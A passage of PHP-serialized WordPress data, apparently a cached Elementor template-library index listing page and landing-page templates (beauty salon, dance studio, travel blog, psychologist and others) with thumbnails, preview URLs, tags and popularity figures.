Home\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/home-1.jpg\";s:12:\"tmpl_created\";i:1608622383;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/beauty-salon-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:408;s:11:\"trend_index\";i:56;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:347;a:19:{s:4:\"tmpl\";i:1178;s:2:\"id\";i:18317;s:5:\"title\";s:26:\"Insurance &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Life-Insirance.png\";s:12:\"tmpl_created\";i:1614769488;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/insurance-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:61:\"[\"Business\",\"Family\",\"Financial\",\"Insurance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:870;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:348;a:19:{s:4:\"tmpl\";i:1128;s:2:\"id\";i:16518;s:5:\"title\";s:29:\"Beauty Salon &#8211; Services\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/12/services-1.jpg\";s:12:\"tmpl_created\";i:1608622386;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/beauty-salon-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:664;s:11:\"trend_index\";i:261;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:349;a:19:{s:4:\"tmpl\";i:1168;s:2:\"id\";i:17401;s:5:\"title\";s:40:\"Conference Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280.png\";s:12:\"tmpl_created\";i:1612724753;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/conference-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:59:\"[\"Conference\",\"Event\",\"Events\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:799;s:11:\"trend_index\";i:540;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:350;a:19:{s:4:\"tmpl\";i:503;s:2:\"id\";i:5447;s:5:\"title\";s:7:\"About 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_5.png\";s:12:\"tmpl_created\";i:1520443514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:48;s:11:\"trend_index\";i:12;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:351;a:19:{s:4:\"tmpl\";i:1073;s:2:\"id\";i:15486;s:5:\"title\";s:25:\"Travel Blog &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/About.jpg\";s:12:\"tmpl_created\";i:1606215720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/travel-blog-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:608;s:11:\"trend_index\";i:343;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:352;a:19:{s:4:\"tmpl\";i:1166;s:2:\"id\";i:17368;s:5:\"title\";s:38:\"Real Estate Agency &#8211; Real-Estate\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Real-Estate.png\";s:12:\"tmpl_created\";i:1612711814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/real-estate-agency-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:73:\"[\"Landing Pages\",\"listing\",\"Real estate\",\"Realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:858;s:11:\"trend_index\";i:777;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:353;a:19:{s:4:\"tmpl\";i:1074;s:2:\"id\";i:15478;s:5:\"title\";s:27:\"Travel Blog &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1606215735;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/travel-blog-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:687;s:11:\"trend_index\";i:564;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:354;a:19:{s:4:\"tmpl\";i:1170;s:2:\"id\";i:17423;s:5:\"title\";s:57:\"Volunteer Calls Thank You Page &#8211; Social Involvement\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/02/Volunteer-Calls-TYP.jpg\";s:12:\"tmpl_created\";i:1612726058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/volunteer-calls-thank-you-page-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:62:\"[\"Care\",\"Involvement\",\"Landing Pages\",\"Thank You\",\"Volunteer\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:857;s:11:\"trend_index\";i:818;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:355;a:19:{s:4:\"tmpl\";i:507;s:2:\"id\";i:5480;s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";i:1520443522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-4-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:428;s:11:\"trend_index\";i:303;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:356;a:19:{s:4:\"tmpl\";i:1075;s:2:\"id\";i:15467;s:5:\"title\";s:24:\"Travel Blog &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/11/Home.jpg\";s:12:\"tmpl_created\";i:1606215756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/travel-blog-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:567;s:11:\"trend_index\";i:224;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:357;a:19:{s:4:\"tmpl\";i:1169;s:2:\"id\";i:17409;s:5:\"title\";s:37:\"Webinar Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Webinar-TYP.png\";s:12:\"tmpl_created\";i:1612725644;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/webinar-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:56:\"[\"Event\",\"Events\",\"Landing Pages\",\"Thank You\",\"Webinar\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:868;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:358;a:19:{s:4:\"tmpl\";i:1056;s:2:\"id\";i:15317;s:5:\"title\";s:25:\"Dance Studio &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/10/Home.jpg\";s:12:\"tmpl_created\";i:1603181291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/dance-studio-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:596;s:11:\"trend_index\";i:301;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:359;a:19:{s:4:\"tmpl\";i:545;s:2:\"id\";i:6027;s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";i:1520443639;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-5-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:40;s:11:\"trend_index\";i:40;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:360;a:19:{s:4:\"tmpl\";i:1160;s:2:\"id\";i:17258;s:5:\"title\";s:32:\"Beauty Product &#8211; eCommerce\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Beauty-Product.png\";s:12:\"tmpl_created\";i:1610903153;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/beauty-product-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:38:\"[\"Beauty\",\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:797;s:11:\"trend_index\";i:703;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:361;a:19:{s:4:\"tmpl\";i:1057;s:2:\"id\";i:15334;s:5:\"title\";s:26:\"Dance Studio &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/About.jpg\";s:12:\"tmpl_created\";i:1603181364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/dance-studio-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:626;s:11:\"trend_index\";i:373;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:362;a:19:{s:4:\"tmpl\";i:546;s:2:\"id\";i:6036;s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";i:1520443641;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-6-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:90;s:11:\"trend_index\";i:123;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:363;a:19:{s:4:\"tmpl\";i:1171;s:2:\"id\";i:17435;s:5:\"title\";s:39:\"Gym &#8211; App Service &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-4.png\";s:12:\"tmpl_created\";i:1612726462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/gym-app-service-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:58:\"[\"App\",\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:767;s:11:\"trend_index\";i:577;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:364;a:19:{s:4:\"tmpl\";i:1058;s:2:\"id\";i:15349;s:5:\"title\";s:28:\"Dance Studio &#8211; Classes\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes.jpg\";s:12:\"tmpl_created\";i:1603181425;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:629;s:11:\"trend_index\";i:458;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:365;a:19:{s:4:\"tmpl\";i:1156;s:2:\"id\";i:17111;s:5:\"title\";s:33:\"Sunglasses Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/01/Sunglasses-LP-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610632408;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/sunglasses-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Ecommerce\",\"Fashion\",\"Landing Pages\",\"Sale\",\"Sunglasses\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:812;s:11:\"trend_index\";i:732;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:366;a:19:{s:4:\"tmpl\";i:1055;s:2:\"id\";i:15366;s:5:\"title\";s:29:\"Dance Studio &#8211; Schedule\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes-Schedule.jpg\";s:12:\"tmpl_created\";i:1603181056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/dance-studio-schedule/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:698;s:11:\"trend_index\";i:602;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:367;a:19:{s:4:\"tmpl\";i:1157;s:2:\"id\";i:17223;s:5:\"title\";s:25:\"Fashion &#8211; eCommerce\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2021/01/Commerce-Fashion.png\";s:12:\"tmpl_created\";i:1610902553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/fashion-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:808;s:11:\"trend_index\";i:745;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:368;a:19:{s:4:\"tmpl\";i:1059;s:2:\"id\";i:15373;s:5:\"title\";s:28:\"Dance Studio &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Pricing.jpg\";s:12:\"tmpl_created\";i:1603181678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:731;s:11:\"trend_index\";i:661;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:369;a:19:{s:4:\"tmpl\";i:1151;s:2:\"id\";i:17017;s:5:\"title\";s:28:\"Shoes Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/01/Shoes-LP-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610535361;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/shoes-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:55:\"[\"Discount\",\"Ecommerce\",\"Landing Pages\",\"Sale\",\"Shoes\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:803;s:11:\"trend_index\";i:642;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:370;a:19:{s:4:\"tmpl\";i:508;s:2:\"id\";i:5488;s:5:\"title\";s:7:\"About 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_8.png\";s:12:\"tmpl_created\";i:1520443524;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:307;s:11:\"trend_index\";i:169;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:371;a:19:{s:4:\"tmpl\";i:1060;s:2:\"id\";i:15384;s:5:\"title\";s:28:\"Dance Studio &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/10/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1603181738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:741;s:11:\"trend_index\";i:721;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:372;a:19:{s:4:\"tmpl\";i:556;s:2:\"id\";i:6122;s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";i:1520443661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:38;s:11:\"trend_index\";i:26;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:373;a:19:{s:4:\"tmpl\";i:1163;s:2:\"id\";i:17301;s:5:\"title\";s:53:\"Personal Chef &#8211; Thank You Page &#8211; Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2021/01/TYP-Personal-Chef.jpg\";s:12:\"tmpl_created\";i:1610903622;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/personal-chef-thank-you-page-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:43:\"[\"Chef\",\"Food\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:823;s:11:\"trend_index\";i:754;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:374;a:19:{s:4:\"tmpl\";i:1042;s:2:\"id\";i:15158;s:5:\"title\";s:26:\"Psychologist &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/About.jpg\";s:12:\"tmpl_created\";i:1600157561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/psychologist-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:618;s:11:\"trend_index\";i:426;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:375;a:19:{s:4:\"tmpl\";i:1164;s:2:\"id\";i:17313;s:5:\"title\";s:60:\"Development Course  &#8211; Thank You Page &#8211; Education\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Dev-Course-TYP-.png\";s:12:\"tmpl_created\";i:1610903776;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/development-course-thank-you-page-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Education\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:834;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:376;a:19:{s:4:\"tmpl\";i:1045;s:2:\"id\";i:15197;s:5:\"title\";s:28:\"Psychologist &#8211; 